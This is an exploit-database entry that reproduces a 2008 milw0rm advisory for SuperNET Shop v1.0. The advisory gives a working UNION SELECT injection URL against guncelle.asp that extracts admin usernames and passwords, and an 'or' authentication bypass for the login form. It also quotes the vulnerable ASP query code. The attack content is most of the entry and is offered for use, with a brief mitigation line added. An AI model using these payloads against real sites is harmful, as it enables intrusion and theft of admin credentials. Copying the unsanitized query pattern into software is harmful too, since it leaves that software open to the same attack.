header-logo
Suggest Exploit
vendor:
SuperNET Shop
by:
U238 (ugur238)
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: SuperNET Shop
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:supernet_shop:supernet_shop:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SuperNET Shop v1.0 Remote SQL Injection Vulnerability

SuperNET Shop v1.0 is prone to a remote SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries and gain access to unauthorized information. This issue affects the 'id' parameter of the 'guncelle.asp' script. An attacker can exploit this issue to bypass the authentication process and gain access to the administrative panel. The attacker can supply the username and password fields with the value 'or' to bypass the authentication process.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner.
Source

Exploit-DB raw data:

-_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_

SuperNET Shop v1.0  Remote SQL Ä°njection Vulnerability

Discovered By : U238 (ugur238)


webpage : ugur238.org (the end)


mail : setuid.noexec0x1@hotmail.com

>From : Turkey - Erzincan


Script : http://www.aspindir.com/indir.asp?ID=2

Script (alternativ) : http://rapidshare.de/files/39062184/supershop.zip.html

-_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-

Exploit:

localhost:2222/lab/shop/secure/admin/guncelle.asp?id=1+union+select+0,KullaniciAdi,2,sifre,4,5,6,7,8,9+from+admin


Error File : guncelle.asp


Error Code : 

line - id = Request.QueryString("id")

line - SQL_L = "Select * from products WHERE id =" &id 


Admin Panel : target/secure/admin



-_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-

Admin Panel Bypass Exploit : 


Error File : 

giris.asp


Error Code : 

Sorgu="select * from admin where KullaniciAdi = '" & request.form("kulad") & "' and Sifre = '" & Request.form("sifre") & "'"
Rs.Open Sorgu, Baglanti, 1, 3

------------------------

secure/admin/default.asp  

username : 'or'

password : 'or'


Ye34h lets see you now admin panell ; ) 



*/ Greatz : The_BekiR  - ZeberuS  - ka0x - nettoxic - fahn - str0ke


MUSTAFA KEMAL ATATURK -  ATAM Ä°ZÄ°NDEYIZ 

                                                                    /*

# milw0rm.com [2008-04-08]

Navigation

Suggest Exploit

Services By CQR